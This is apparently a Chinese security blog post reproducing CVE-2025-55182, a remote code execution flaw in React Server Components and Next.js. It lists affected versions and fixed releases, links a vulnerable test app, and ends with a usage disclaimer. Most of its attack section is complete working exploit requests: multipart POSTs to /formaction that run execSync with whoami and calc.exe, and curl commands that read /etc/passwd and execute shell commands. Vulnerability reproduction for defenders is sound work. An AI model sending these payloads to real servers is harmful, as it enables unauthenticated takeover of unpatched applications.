React Server Components(React服务端组件)未授权远程代码执行漏洞CVE-2025-55182漏洞复现
漏洞描述:
React 核心团队确认了一个存在于 React Server Components (RSC) 实现中的严重远程代码执行 (RCE) 漏洞。该漏洞被分配了 CVE-2025-55182(Next.js 对应编号 CVE-2025-66478),CVSS 评分高达 10.0。
核心受影响版本
-
19.0.0 -
19.0.1(注:部分早期补丁未完全覆盖) -
19.1.x -
19.2.0
框架层面的波及
-
Next.js v15.0.0 - v15.0.4 -
Next.js v15.1.0 - v15.1.8 -
Next.js v15.2.x - v15.5.6 -
Next.js v16.0.0 - v16.0.6 -
Next.js v14.3.0-canary.77 及以上 Canary 版本
其他框架:
-
Waku, RedwoodJS (RSC模式), 以及任何手动集成 react-server-dom-webpack/parcel的自定义架构。
注意:仅使用 Client Components (Pages Router) 的老旧 Next.js 应用不受此漏洞影响。
漏洞环境安装:
首先安装nodejs环境,下载完成后直接安装,然后配置环境变量,下载地址
https://nodejs.org/en/download下载有问题的环境
https://www.xsssql.com/wp-content/uploads/2025/12/CVE-2025-55182-test.zip解压下载存在问题的环境后启动环境
# Install dependencies
npm install
# Start vulnerable server (port 3002)
npm start
使用burp重放测试exp,执行whoami命令
POST /formaction HTTP/1.1
Host: 192.168.43.172:3002
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----Boundary
Content-Length: 293
------Boundary
Content-Disposition: form-data; name="$ACTION_REF_0"
------Boundary
Content-Disposition: form-data; name="$ACTION_0:0"
{"id":"vm#runInThisContext","bound":["global.process.mainModule.require(\"child_process\").execSync(\"whoami\").toString()"]}
------Boundary--
执行calc.exe 进行测试:
POST /formaction HTTP/1.1
Host: 192.168.43.172:3002
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----Boundary
Content-Length: 293
------Boundary
Content-Disposition: form-data; name="$ACTION_REF_0"
------Boundary
Content-Disposition: form-data; name="$ACTION_0:0"
{"id":"vm#runInThisContext","bound":["global.process.mainModule.require(\"child_process\").execSync(\"calc.exe\").toString()"]}
------Boundary--
curl参考:
# Start server first
npm start
# Test fs read
curl -X POST http://localhost:3002/formaction
-F '$ACTION_REF_0='
-F '$ACTION_0:0={"id":"fs#readFileSync","bound":["/etc/passwd","utf8"]}'
# Test command execution
curl -X POST http://localhost:3002/formaction
-F '$ACTION_REF_0='
-F '$ACTION_0:0={"id":"child_process#execSync","bound":["whoami"]}'
# Test vm code execution
curl -X POST http://localhost:3002/formaction
-F '$ACTION_REF_0='
-F '$ACTION_0:0={"id":"vm#runInThisContext","bound":["1+1"]}'
# Test prototype chain access
curl -X POST http://localhost:3002/formaction
-F '$ACTION_ID_abc123def456#constructor='修复命令:
# 15.0.x系列
npm install next@15.0.5
# 15.1.x系列
npm install next@15.1.9
# 15.2.x系列
npm install next@15.2.6
# 15.3.x系列
npm install next@15.3.6
# 15.4.x系列
npm install next@15.4.8
# 15.5.x系列
npm install next@15.5.7
# 16.0.x系列
npm install next@16.0.7漏洞评估:
漏洞相对来说鸡肋,因为该洞对纯前端React和前后端分离架构的应用无危害,如果后端使用nodejs开发的影响较为严重,但仍建议使用必要的安全措施。所有使用 React Server Components 的应用程序都应立即升级到官方修复版本,无论是否使用 Server Function 功能。
参考链接:
https://github.com/ejpir/CVE-2025-55182-poc
0x01 阅读须知
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
THE END
0
二维码
海报
React Server Components(React服务端组件)未授权远程代码执行漏洞CVE-2025-55182漏洞复现
漏洞描述:
React 核心团队确认了一个存在于 React Server Components (RSC) 实现中的严重远程代码执行 (RCE) 漏洞。该漏洞被分配了 CVE-2025-55182(Next.js 对应编号 CVE-2025-66478),CVSS 评分高达 10.0。
&nb……
共有 0 条评论